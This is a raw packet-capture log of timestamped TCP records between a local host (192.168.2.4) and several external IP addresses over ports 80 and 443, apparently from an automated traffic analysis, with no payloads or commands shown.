Sep 27, 2024 00:15:14.343574047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343581915 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.343609095 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.344151974 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344166994 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344182968 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344197989 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344213963 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344228983 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344233036 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.344247103 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344274998 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.344274998 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.344702005 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344717026 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344732046 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344743967 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.344748020 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344763994 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344767094 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.344780922 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344795942 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.344820976 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.344854116 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.345192909 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345206022 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345221996 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345237970 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345251083 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.345253944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345271111 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345285892 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345292091 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.345302105 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345304012 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.345349073 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.345479012 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345494032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345510006 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345524073 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345540047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345555067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345566034 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.345570087 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.345587015 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.346625090 CEST	443	49776	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:14.346713066 CEST	443	49776	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:14.347115040 CEST	49776	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:14.347520113 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347534895 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347554922 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347568035 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.347606897 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.347618103 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347632885 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347647905 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347662926 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347672939 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.347714901 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.347786903 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347877979 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347924948 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.347959995 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347975016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.347990990 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348109961 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.348175049 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348227978 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.348253965 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348268986 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348284006 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348306894 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348309994 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.348323107 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348339081 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348360062 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.348382950 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.348691940 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348706007 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348722935 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348740101 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348748922 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.348757029 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348773003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348788977 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.348795891 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.348826885 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.349072933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349087954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349138021 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.349222898 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349237919 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349253893 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349267960 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.349267960 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349287987 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349298000 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.349302053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349318027 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349324942 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.349334002 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349349022 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349364042 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.349394083 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.349756956 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349771976 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349786997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349801064 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349817991 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349831104 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.349833012 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349853039 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349853992 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.349868059 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.349872112 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.349910975 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.350081921 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350097895 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350112915 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350128889 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350172997 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.350199938 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350207090 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.350218058 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350234032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350248098 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350255966 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.350282907 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.350333929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350426912 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350442886 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350456953 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350472927 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350485086 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.350487947 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350505114 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350512981 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.350521088 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.350528955 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.350567102 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.351028919 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351044893 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351059914 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351077080 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351083040 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.351093054 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351109028 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351125002 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351131916 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.351141930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351155043 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.351159096 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351176023 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351191998 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351193905 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.351210117 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351224899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351243019 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.351244926 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.351244926 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.351283073 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.390037060 CEST	49776	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:14.390063047 CEST	443	49776	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:14.390074968 CEST	49776	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:14.390083075 CEST	443	49776	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:14.393820047 CEST	443	49775	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:14.393903017 CEST	443	49775	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:14.393949032 CEST	49775	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:14.393964052 CEST	49775	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:14.397289038 CEST	49775	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:14.397313118 CEST	443	49775	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:14.431050062 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431111097 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431127071 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431179047 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.431185961 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431204081 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431258917 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.431365967 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431380987 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431427002 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431430101 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.431443930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431459904 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431488991 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.431512117 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.431684971 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431700945 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431716919 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431731939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431747913 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431762934 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.431766033 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.431790113 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.431806087 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.431972980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432133913 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432149887 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432166100 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432178020 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.432182074 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432199955 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432208061 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.432218075 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432234049 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432244062 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.432250023 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432265997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432271004 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.432284117 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432300091 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432303905 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.432317019 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432348967 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.432861090 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.432905912 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.433085918 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433100939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433115959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433130980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433136940 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.433146954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433171034 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.433187962 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433203936 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433219910 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433231115 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.433234930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433249950 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433260918 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.433265924 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433283091 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433289051 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.433299065 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433932066 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.433975935 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.435204983 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435220003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435235023 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435267925 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435281992 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435287952 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.435297012 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435312986 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435316086 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.435339928 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.435516119 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435564995 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.435601950 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435616970 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435631990 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435650110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435662985 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.435667038 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.435719013 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.436055899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436070919 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436089039 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436101913 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436111927 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.436116934 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436132908 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.436132908 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436150074 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436157942 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.436166048 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436183929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436187029 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.436198950 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436216116 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436232090 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.436256886 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.436449051 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.436549902 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436640978 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436656952 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436681032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436697960 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436712980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436727047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.436731100 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.436772108 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437138081 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437155008 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437169075 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437185049 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437199116 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437202930 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437222004 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437222958 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437237978 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437239885 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437253952 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437269926 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437278986 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437285900 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437303066 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437309027 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437319994 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437346935 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437501907 CEST	49777	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:14.437545061 CEST	443	49777	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:14.437675953 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437691927 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437797070 CEST	49777	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:14.437835932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437850952 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437865019 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437865973 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437884092 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437889099 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437900066 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437915087 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437916040 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437932014 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.437937975 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.437968016 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.438251019 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438263893 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438312054 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438314915 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.438328028 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438343048 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438366890 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.438373089 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438375950 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438381910 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438390017 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438416004 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.438781023 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438796997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438811064 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438827991 CEST	80	49774	147.45.44.104	192.168.2.4
